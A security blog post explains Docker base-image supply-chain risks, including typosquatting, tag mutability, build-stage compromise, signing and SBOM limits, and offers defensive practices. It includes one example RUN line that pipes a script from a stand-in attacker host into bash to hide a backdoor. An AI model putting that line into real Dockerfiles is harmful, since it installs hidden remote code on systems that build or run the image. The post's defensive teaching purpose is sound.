Security · 11 min read

Your Docker Base Image Is Someone Else's Code You Never Reviewed

Docker supply chain attacks exploit the trust teams place in base images. Typosquatting, poisoned layers, and phantom dependencies are real threats most teams ignore.

By Security Team · March 8, 2026

A fintech startup pulled node:18-alpine from Docker Hub every single build for two years. Nobody questioned it. Why would they? It's the official image. Maintained by the Node.js team. Scanned by Docker. Safe.

Except one Friday, a developer fat-fingered nodejs:18-alpine into a new microservice Dockerfile. Note the extra "js". That image existed on Docker Hub. Someone had uploaded it seven months earlier. It contained a perfectly functional Node.js runtime — plus a cryptocurrency miner that activated after 72 hours.

Took them eleven days to notice the CPU spike.

Nobody Reads the Dockerfile After It Works

This is the uncomfortable reality of container security. Teams obsess over runtime vulnerabilities, network policies, pod security contexts — all valid concerns. But the foundation of every container is a FROM statement, and that statement is an act of faith. You're saying "I trust whoever built this image, and everyone who contributed to every layer beneath it, and the registry that served it to me, and the network path it traveled." That's a lot of trust for a single line of code.

Docker Hub hosts over 15 million repositories. The verified publisher program covers maybe a few hundred. Everything else? Anyone can upload anything. And the naming system is first-come-first-served.

Typosquatting Isn't Just an npm Problem

Package registries learned this lesson years ago. The crossenv typosquat of cross-env on npm racked up thousands of installs before anyone noticed. Docker Hub has the exact same problem but with higher stakes — a malicious Docker image runs with whatever privileges your container runtime grants it.

Common typosquat patterns that have actually been found in the wild:

# Real image
FROM python:3.11-slim

# Typosquats that have existed at various points
FROM pytohn:3.11-slim
FROM python3:3.11-slim
FROM pyhton:3.11-slim

# Namespace confusion
FROM library/nginx    # Official
FROM nginx/nginx      # Could be anyone

Docker's "official images" live in the library/ namespace, but most developers just type nginx or python without thinking about namespaces at all. The resolution logic handles it. Usually.
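Those resolution rules can be sketched as a small shell function. This is an approximation of the expansion Docker performs, not its actual implementation:

```shell
# Approximate sketch of how a bare image name expands to a full
# reference -- not Docker's real code, just the idea behind it.
normalize_image() {
  ref="$1"
  # No tag or digest? Default to :latest
  case "$ref" in
    *@sha256:*|*:*) ;;
    *) ref="$ref:latest" ;;
  esac
  # No namespace? Official images live under library/
  case "${ref%%:*}" in
    */*) ;;
    *) ref="library/$ref" ;;
  esac
  # No registry host? Default to Docker Hub
  case "$ref" in
    *.*/*|localhost/*) ;;
    *) ref="docker.io/$ref" ;;
  esac
  printf '%s\n' "$ref"
}

normalize_image nginx         # docker.io/library/nginx:latest
normalize_image nginx/nginx   # docker.io/nginx/nginx:latest
```

The second call is the trap: one extra path segment and you've silently left the official namespace.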

What's Actually Inside That Layer?

A Docker image is a stack of filesystem layers. Each layer is a tar archive. When you pull ubuntu:22.04, you're downloading layers built by Canonical's build system, pushed to Docker Hub, stored on their CDN. But here's the thing — you can't see what happened during the build just by inspecting the image.

Run docker history on any image. You'll see the commands that were used. But RUN commands that download and delete files in the same layer leave no trace in the final filesystem. This is well-known and totally legitimate for reducing image size. It's also exactly how you'd hide a backdoor.

RUN curl -sL https://attacker.com/payload.sh | bash && \
    rm -f /tmp/payload.sh && \
    # payload already installed a systemd service or cron job,
    # or modified an existing binary;
    # nothing suspicious left in this layer's diff
    echo "done"

The Codecov breach in 2021 used a similar technique. Attackers modified a bash uploader script that thousands of CI pipelines downloaded and executed. It ran, exfiltrated credentials, and left minimal traces.

Pinning Tags Doesn't Fix This

Security guides always recommend pinning image versions. Use node:18.19.0-alpine3.19 instead of node:latest. Good advice. But tags are mutable. The image behind node:18.19.0-alpine3.19 can change. The maintainer can push a new build to the same tag, and your next docker pull gets different bits.

This happens legitimately all the time — security patches to base OS packages get rolled into existing tags. But it means tag pinning is a suggestion, not a guarantee.

Digest pinning is the actual answer:

# Tag pinning - mutable, can change underneath you
FROM node:18.19.0-alpine3.19

# Digest pinning - immutable, cryptographically verified
FROM node@sha256:a1b2c3d4e5f6...

# Best practice - both for readability AND security
FROM node:18.19.0-alpine3.19@sha256:a1b2c3d4e5f6...

Most teams don't do this. It's ugly. It breaks when you want to update. You need tooling to manage the digests. But it's the only way to guarantee you're getting the exact same image every time.
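What that digest actually is: the SHA-256 hash of the image's manifest bytes, which anyone can recompute. A sketch with a stand-in manifest file (real manifests come from the registry, e.g. via `docker buildx imagetools inspect <image>`):

```shell
# Stand-in manifest; a real one is served by the registry.
printf '{"schemaVersion":2,"layers":[]}' > manifest.json

# The image digest is the SHA-256 of the manifest bytes.
# Change one byte anywhere and the digest no longer matches.
digest="sha256:$(sha256sum manifest.json | cut -d' ' -f1)"
echo "FROM node@${digest}"
```

Because the manifest in turn lists the digest of every layer, pinning one digest pins the entire content tree.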

Multi-Stage Builds Create Invisible Trust Chains

Multi-stage builds made Dockerfiles cleaner and images smaller. They also made supply chain attacks harder to spot.

# Stage 1: build
FROM golang:1.21 AS builder
WORKDIR /src
COPY . .
RUN go build -o /app

# Stage 2: runtime
FROM alpine:3.19
COPY --from=builder /app /app
CMD ["/app"]

Looks clean. But golang:1.21 brings in the entire Go toolchain — compilers, linkers, standard library. If any of that is compromised, your compiled binary is compromised. And the final image is just alpine:3.19 plus your binary. No Go toolchain to scan. No build tools to audit. The attack surface existed during build time and disappeared.

The SolarWinds attack worked exactly like this, conceptually. Compromise the build environment, not the final artifact. By the time anyone looks at what shipped, the malicious tools are gone.

Private Registries Are Not Automatically Safer

Moving to a private registry (ECR, GCR, ACR, Harbor) solves the typosquatting problem. It does not solve the "what's inside the image" problem. Unless you're building every image from scratch — including the OS base — you're still pulling upstream images and trusting them.

What actually helps:

# 1. Scan on push, not just on pull
# Most registries support this natively now
# ECR: enable Enhanced scanning (Inspector-based)
# GCR: Artifact Analysis is on by default
# Harbor: Trivy or Clair integration

# 2. Admission controllers that enforce signatures
# Cosign + Sigstore for signing
cosign sign --key cosign.key registry.example.com/myapp:v1.2.3

# Kubernetes policy that rejects unsigned images
# (Kyverno example)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  rules:
    - name: check-signature
      match:
        resources:
          kinds: ["Pod"]
      verifyImages:
        - imageReferences: ["registry.example.com/*"]
          attestors:
            - entries:
                - keys:
                    publicKeys: |-
                      -----BEGIN PUBLIC KEY-----
                      ...
                      -----END PUBLIC KEY-----

Sigstore adoption is growing fast. GitHub Actions has supported it natively for container builds since late 2023. But industry-wide adoption is still maybe 10-15% of organizations running Kubernetes in production. Generous estimate.
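Under the hood, signing an image is just signing its digest with a private key and checking it with the public half. The flow cosign automates can be sketched with plain openssl (key and file names here are illustrative):

```shell
# Throwaway RSA keypair (cosign manages its own key formats)
openssl genrsa -out demo.key 2048 2>/dev/null
openssl rsa -in demo.key -pubout -out demo.pub 2>/dev/null

# "Sign the image": sign its digest
printf 'sha256:a1b2c3d4e5f6' > image-digest.txt
openssl dgst -sha256 -sign demo.key -out digest.sig image-digest.txt

# Verification succeeds only if digest, signature, and key all match
openssl dgst -sha256 -verify demo.pub -signature digest.sig image-digest.txt
# prints: Verified OK
```

The admission controller's job is simply to run the verify step before any Pod is scheduled, and to reject the Pod when it fails.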

The SBOM Problem Nobody Talks About

Software Bill of Materials. The cybersecurity executive order made everyone generate them. Docker even built docker sbom into the CLI (via Syft). Generate an SBOM for any image in seconds.

Great. Now what?

An SBOM tells you what packages are in the image. It doesn't tell you if those packages were tampered with. It doesn't tell you if the build process was compromised. It doesn't tell you if the image was modified after the SBOM was generated. It's an inventory list written by the person you're trying to verify.
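To make that concrete: an SBOM is structured inventory, nothing more. With a hand-made fragment (heavily simplified; real SBOMs from `docker sbom <image>` or Syft use SPDX or CycloneDX), answering "is this package listed?" is trivial — and that is the only kind of question it can answer:

```shell
# Hypothetical, simplified SBOM fragment for illustration only.
cat > sbom.json <<'EOF'
{"artifacts":[{"name":"openssl","version":"3.0.2"},
              {"name":"zlib","version":"1.2.13"}]}
EOF

# Answers "is openssl in this image?" -- not "is openssl genuine?"
grep -q '"name":"openssl"' sbom.json && echo "openssl listed"
```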

SBOMs are useful for vulnerability tracking. For supply chain security, they're necessary but nowhere near sufficient. You need attestations about the build process itself — provenance information that says "this image was built by this CI system, from this source commit, using these tools, and here's a cryptographic proof." SLSA (Supply-chain Levels for Software Artifacts) defines the framework. Most organizations are at SLSA Level 1 at best.

Practical Steps That Actually Reduce Risk

Forget the theoretical perfect setup. Here's what moves the needle for real teams shipping real code:

Use distroless or scratch base images where possible. Fewer packages means fewer things to compromise. Google's distroless images contain just the runtime — no shell, no package manager, no curl. An attacker who gets code execution in a distroless container can't apt-get install their toolkit.
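A minimal sketch of the pattern — the distroless image tag is a real Google-published one, while the app itself is hypothetical:

```dockerfile
# Build stage: full toolchain, discarded after the build
FROM golang:1.21 AS builder
WORKDIR /src
COPY . .
RUN CGO_ENABLED=0 go build -o /app

# Runtime stage: no shell, no package manager, no curl
FROM gcr.io/distroless/static-debian12
COPY --from=builder /app /app
ENTRYPOINT ["/app"]
```

CGO_ENABLED=0 matters here: the static-debian12 variant ships no libc, so the binary must be fully static.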

Pin by digest, update deliberately. Use Dependabot or Renovate to propose digest updates as PRs. Review what changed. Yes, it's more work than :latest. That's the point.
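If Renovate is your updater, a config along these lines turns on digest pinning for Docker dependencies (option names taken from Renovate's documentation; verify against the version you run):

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "extends": ["config:recommended"],
  "packageRules": [
    {
      "matchDatasources": ["docker"],
      "pinDigests": true
    }
  ]
}
```

Renovate will then rewrite FROM lines to the tag@digest form and open a PR whenever the digest behind a tag changes, so every update is a reviewable diff.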

Scan continuously, not just at build time. New CVEs get published daily. An image that was clean last Tuesday might have three criticals today. Continuous scanning tools (Snyk Container, Trivy Operator, Prisma Cloud) monitor deployed images.

Build reproducibly. If two people build the same Dockerfile from the same commit and get different images (different digests), you can't verify anything. Reproducible builds are hard — timestamps, file ordering, and compiler randomization all conspire against you — but they're the foundation of verifiable software.
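The timestamp problem is easy to demonstrate with GNU tar, and pinning mtimes and sort order is the same trick reproducible image builders apply to layers (GNU tar options assumed; BSD tar differs):

```shell
mkdir -p demo && echo 'hello' > demo/app.txt

# Same content, different mtime: the archives differ
tar -cf a.tar demo
sleep 1 && touch demo/app.txt
tar -cf b.tar demo
cmp -s a.tar b.tar || echo "a.tar and b.tar differ"

# Pin metadata and the output becomes byte-identical
tar --sort=name --mtime='2024-01-01 00:00Z' --owner=0 --group=0 -cf c.tar demo
tar --sort=name --mtime='2024-01-01 00:00Z' --owner=0 --group=0 -cf d.tar demo
cmp -s c.tar d.tar && echo "c.tar and d.tar are identical"
```

Layer tarballs work the same way: identical bytes in, identical digest out — which is exactly what digest verification depends on.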

Automated Container Scanning

Manual review of Docker images doesn't scale past a handful of services. ScanMyCode.dev runs automated security scans on your containerized applications — Dockerfile misconfigurations, vulnerable base image packages, exposed secrets in layers, and insecure runtime settings. You get a report with exact issues, severity ratings, and remediation steps. Not a 200-page PDF that nobody reads.

Stop Trusting, Start Verifying

Every FROM line in every Dockerfile is a dependency. Treat it like one. Would you add a random npm package without checking its maintainers, download count, and source code? Then don't pull a random Docker image just because the name looks right.

The supply chain is only as strong as the weakest docker pull in your CI pipeline. Find out what you're actually running. Get a Docker security audit — full report within 24 hours, covering base images, build configuration, and runtime security posture.

docker · supply-chain · container-security · base-images · vulnerability-scanning
